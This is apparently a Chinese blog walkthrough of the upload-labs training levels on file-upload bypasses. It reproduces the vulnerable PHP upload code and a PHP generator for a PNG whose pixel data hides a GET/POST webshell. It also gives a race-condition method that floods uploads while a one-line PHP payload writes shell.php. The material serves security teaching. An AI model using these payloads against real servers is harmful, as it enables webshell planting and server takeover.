文件上传之图片马混淆绕过与条件竞争

最新推荐文章于 2024-04-24 11:30:00 发布
最新推荐文章于 2024-04-24 11:30:00 发布
阅读量1.1k 收藏 1
点赞数
文章标签: 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CQ17743254852/article/details/132711023
版权

一、图片马混淆绕过

1.上传gif

imagecreatefromxxxx函数把图片内容打散,,但是不会影响图片正常显示

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
    // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
    $filename = $_FILES['upload_file']['name'];
    $filetype = $_FILES['upload_file']['type'];
    $tmpname = $_FILES['upload_file']['tmp_name'];

    $target_path=UPLOAD_PATH.'/'.basename($filename);

    // 获得上传文件的扩展名
    $fileext= substr(strrchr($filename,"."),1);

    //判断文件后缀与类型,合法才进行上传操作
    if(($fileext == "jpg") && ($filetype=="image/jpeg")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromjpeg($target_path);

            if($im == false){
                $msg = "该文件不是jpg格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".jpg";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagejpeg($im,$img_path);
                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "png") && ($filetype=="image/png")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefrompng($target_path);

            if($im == false){
                $msg = "该文件不是png格式的图片!";
                @unlink($target_path);
            }else{
                 //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".png";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagepng($im,$img_path);

                @unlink($target_path);
                $is_upload = true;               
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "gif") && ($filetype=="image/gif")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromgif($target_path);
            if($im == false){
                $msg = "该文件不是gif格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".gif";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagegif($im,$img_path);

                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }
    }else{
        $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
    }
}

首先copy命令生成图片马

然后上传图片马到服务器,保存返回后的图片

然后使用010editor比较,哪些内容没有被混淆,我们就可以把木马写在没有被混淆的内容里

然后直接文件包含,包含图片内的php代码

 

2.上传png

这里可以使用脚本进行图片马制作,里面的php代码基本不会被混淆

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);
 
 
 
$img = imagecreatetruecolor(32, 32);
 
for ($y = 0; $y < sizeof($p); $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round($y / 3), 0, $color);
}
 
imagepng($img,'./1.png');
?>

将图片放在该脚本下的同级目录,运行后生成1.png

生成后查看内容,发现有两个参数,一个GET参数0,一个POST参数1 

 

那就0给到assert,1给到phpinfo();,成功包含 

 

二、条件竞争

1.分析

条件竞争型的漏洞在很多漏洞中都有涉及,在文件上传中造成这种漏洞的原因是代码中是先保存上传的文件在服务器上,然后验证再删除的,这就会造成攻击者可以利用文件被保存在服务器上与被删除的时间间隙来访问文件,然后重新生成了一个新木马

我们可以直接上传一个有写功能的php文件,然后bp抓包,一直发包,同时一直访问刚刚上传的php文件,总有一次会成功生成一个新的木马

看代码片段可以发现文件是先保存在服务器上,然后unlink函数删除的

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}

先上传写功能木马,然后抓包,放到intruder里面,随便找个数字,

然后选持续发包

然后我们一直访问上传的php文件,让它生成新的木马

<?php fputs(fopen('../shell.php','w'),'<?php phpinfo();?>');?>

成功后就会生成一个shell.php

直接访问

Catherines7
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件条件竞争
Bu2n的博客
12-30 1223
条件竞争条件竞争漏洞是服务器端的漏洞,由于服务器端在处理不同的请求时是并发进行的,因此如果并发处理不当或相关操作顺序设计不合理时,将会导致严重的后果 upload-labs 第18关 源码 if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file']['name']; $temp_file = $_FILES['upload_file']
文件过思路总结 - 先知社区1
08-03
在网络安全领域,文件过是一种常见的攻击手段,通常用于突破Web应用防护系统(WAF)的限制,实现恶意文件的上。以下是对文件过思路的详细说明: 1. **Accept-Encoding 改变编码类型**: WAF通常会...
文件图片混淆
captain_miaomiao的博客
09-10 241
imagecreatefromxxxx函数把图片内容打散,,但是不会影响图片正常显示首先copy命令生成图片然后上图片到,保存返回后的图片然后使用比较,哪些内容没有被混淆,我们就可以把木写在没有被混淆的内容里然后直接文件包含,包含图片内的php代码。
web安全-文件漏洞-图片制作-相关php函数讲解-upload靶场通关详细教学(3)
最新发布
m0_59598029的博客
04-24 1053
制作图片有两种方法,一种是文本方式打开,末尾粘贴一句话木,令一种是使用命令进行合成。首先准备好一个图片(这里是1.png)。!将一个图片以文本格式打开(这里用的Notepad++,以记事本方式打开修改也能连接成功,不过修改后图片无法正常显示了)。!后面粘贴上一句话木。!图片依然可以正常打开。!首先准备好一个图片(这里是1.png)。再准备好一个一句话木(这里是2.php)。!打开命令提示符,首先进入上面两个文件存放的路径。使用下面的命令进行图片合成。!!
【upload-labs】图片过pass13~16
qq_43665434的博客
03-21 1885
【upload-labs】图片过pass13~16 【pass-13】文件头检查过 1、源码分析 function getReailFileType($filename){ $file = fopen($filename, "rb"); //以字节流的形式打开上文件 $bin = fread($file, 2); //只读2字节 fclose($file); $strInfo = @unpack("C2chars", $bin); //unpack()解包
【漏洞靶场】文件后端检测图片过--upload-labs
m0_46344990的博客
05-01 1457
一、漏洞描述 在upload-labs第十四关,服务器用检测上图片两个字节是否为图片格式来验证上文件合法性。可以通过制作图片过,再配合文件包含漏洞解析文件来获取服务器配置信息。 二、漏洞发现 先在本地写php脚本若上成功,且知道上文件在网站保存的路径,可通过网页访问获得服务器配置信息,命名为z.php。但是在这里不能用php文件直接上,需要制作图片过服务器检测文件二进制头信息。 有两种方法,但都是一个意思,将写入图片里面 方法一:准备z.php和一个真jpg图片用cmd命令行
文件图片
2301_80661529的博客
03-04 1275
图片:就是在正常图片中插入木
一键给apk资源文件添加资源混淆
04-08
一键给apk资源文件添加资源混淆
高级SQL注入:混淆过.pdf
03-21
高级SQL注入:混淆过 本文总结了高级SQL注入技术,包括混淆过技术,旨在帮助安全研究人员和开发者更好地理解和防止SQL注入攻击。下面是本文中提到的关键知识点: 1. 过滤规避(Mysql):通过使用特殊的SQL...
apk加密混淆字典文件
03-21
apk加密混淆字典文件 添加到proguard-rules.pro 添加以下 -obfuscationdictionary bt-proguard.txt -classobfuscationdictionary bt-proguard.txt -packageobfuscationdictionary bt-proguard.txt
分支混淆中的条件异常代码构造研究
01-20
当前方法构造的条件异常代码中,关键数据具有二值性问题,有利于分支混淆的检测、发现和约束条件获取,降低了混淆的隐蔽性和与符号执行的对抗性;基于该缺点,提出一种使关键数据具有多样性特征的条件异常代码构造...
2-7 【实验】14-图片过+代码审计
山兔的博客
03-27 3362
这节课,我们要开始讲pass-13,讲的跟我们之前稍有点不一样,因为这个漏洞,它不是单个的利用,是结合其它漏洞一块去利用 今天的漏洞是上图片到服务器,图片就是图片的一种木,就是带有木图片图片 注意的有三点: 1.保证上后的图片中仍然包含完整的一句话或webshell代码。 2.使用文件包含漏洞能运行图片中的恶意代码。 这点就是我们这篇文章讲的组合漏洞的一个利用,就是利用文件包含漏洞 3.图片要.jpg,.png,.gif三种后缀都上成功才算过关! 图片就是我们在图片当中插入一句
文件漏洞进阶教程/白名单过/图片制作/图片执行
ChenD的学习笔记
10-23 7493
文件漏洞进阶教程/白名单过/图片制作/图片执行
文件过】uploads17关-条件竞争
ssrf
03-14 584
目录0x001 源码审计0x002 过 0x001 源码审计 $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file']['name']; $temp_file = $_FILES['upload_file']['tmp_name']; $file_ext =
文件图片
qq_45951598的博客
02-04 71
图片制作 先准备一个一个shell.php的文件,还有一张图片。 copy 3.jpg/b + shell.php/a 10.jpg ## 二次渲染
3-1 【实验】15-图片过+代码审计
山兔的博客
03-30 240
我们这篇文章,讲的是pass-14,14和13,它的方法是一样的,它们的区别是后台代码不一样,我们先按照13的步骤来,然后在根据后台代码进行分析一下,看看13和14,到底有什么区别 我们上图片,菜刀连接 这样,我们就可以得到webshell,和上一篇文章是一摸一样的,我们这篇文章讲的就是,它的后台代码是如何实现的 函数声名isImage,代码执行到这里,只能加载到内存,不能执行 $res = isImage($temp_file); 判断一个文件是不是isImage,就到了我们的函数里面了 $ty
文件漏洞06】服务端文件内容检测与过实验+图片制作方法(基于upload-labs-14靶场)
Fighting_hawk的博客
03-01 3837
1. 了解文件头部内容以及服务器检验文件内容与类型的方法; 2. 掌握图片的制作方法; 3. 掌握过服务器端内容检测的方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值